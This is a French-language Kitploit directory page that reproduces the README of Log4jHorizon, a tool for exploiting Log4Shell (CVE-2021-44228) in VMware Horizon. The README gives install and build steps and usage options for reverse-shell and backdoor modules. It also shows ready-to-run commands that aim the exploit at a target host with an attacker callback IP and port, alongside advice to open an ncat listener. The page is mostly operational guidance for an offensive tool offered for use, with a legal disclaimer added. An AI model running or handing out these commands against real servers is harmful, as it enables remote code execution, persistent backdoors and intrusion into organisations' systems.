Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Log4jHorizon — Exploitation de CVE-2021-44228 dans VMWare Horizon pour l'exécution de code à distance et plus encore. | Kitploit
Outils/GitHubGitHub/puzzlepeaches/log4jhorizon
Scanners de VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubpuzzlepeaches/log4jhorizon

Log4jHorizon

Exploitation de CVE-2021-44228 dans VMWare Horizon pour l'exécution de code à distance et plus encore.

Voir le dépôt
120134il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Log4jHorizon

Exploitation de CVE-2021-44228 dans VMWare Horizon pour l'exécution de code à distance et plus encore.

  • Crossing the Log4j Horizon - A Vulnerability With No Return

Le code et le README.md sont un peu dispersés cette fois-ci. Des mises à jour arrivent !

Pourquoi ?

Les preuves de concept pour cette vulnérabilité sont dispersées et doivent être réalisées manuellement. Ce dépôt automatise le processus d'exploitation. Consultez l'article de blog ci-dessus pour des conseils sur la post-exploitation.

Installation

Ce dépôt peut être utilisé manuellement ou avec Docker.

Installation manuelle

Pour télécharger et exécuter l'exploit manuellement, suivez les étapes suivantes. Tout d'abord, assurez-vous que Java et Maven sont installés sur votre machine d'attaque. Pour ce faire avec apt sur les systèmes d'exploitation basés sur Debian, exécutez la commande suivante :

root@kitploit:~
apt update && apt install openjdk-11-jre maven

Clonez le dépôt GitHub et installez toutes les exigences Python :

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jHorizon \
    && cd Log4jHorizon && pip3 install -r requirements.txt

Depuis la racine du dépôt Log4jHorizon, compilez le projet Rogue-Jndi avec la commande ci-dessous :

root@kitploit:~
mvn package -f utils/rogue-jndi/

Installation avec Docker

Tout d'abord, assurez-vous que Docker est installé sur votre machine d'attaque. (Je ne vais pas vous guider pas à pas pour cela)

Ensuite, exécutez la commande suivante pour cloner le dépôt et construire l'image Docker que nous allons utiliser.

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jHorizon \
    && cd Log4jHorizon && docker build -t Log4jHorizon .

Pour exécuter le conteneur, lancez une commande similaire à la suivante avec vos options de ligne de commande ajoutées. Notez que le conteneur ne capturera pas de reverse shell. Vous devez créer un écouteur ncat dans une session shell séparée :

root@kitploit:~
docker run -it -p 1389:1389 Log4jHorizon \
    -r -t horizon.acme.com -i 192.168.1.1 -p 4444

Utilisation

root@kitploit:~
usage: exploit.py [-h] -t URL -i CALLBACK [-p PORT] [-r] [-b]

optional arguments:
  -h, --help            show this help message and exit
  -t URL, --target URL  VMWare Horizon IP
  -i CALLBACK, --ip CALLBACK
                        Callback IP for payload delivery and reverse shell.
  -p PORT, --port PORT  Callback port for reverse shell.
  -r, --revshell        Module to establish reverse shell using node.exe.
  -b, --backdoor        Module to add backdoor.

Exemples

Obtenez un reverse shell en utilisant l'outil installé sur votre système local :

root@kitploit:~
python3 exploit.py -r -t horizon.acme.com -p 442 -i 192.168.1.1

Avertissement

Cet outil est conçu pour être utilisé lors de tests d'intrusion ; l'utilisation de cet outil pour attaquer des cibles sans consentement mutuel préalable est illégale. Il incombe à l'utilisateur final de respecter toutes les lois locales, étatiques et fédérales applicables. Les développeurs déclinent toute responsabilité et ne sont pas responsables de tout usage abusif de ce programme.

Télécharger l’outil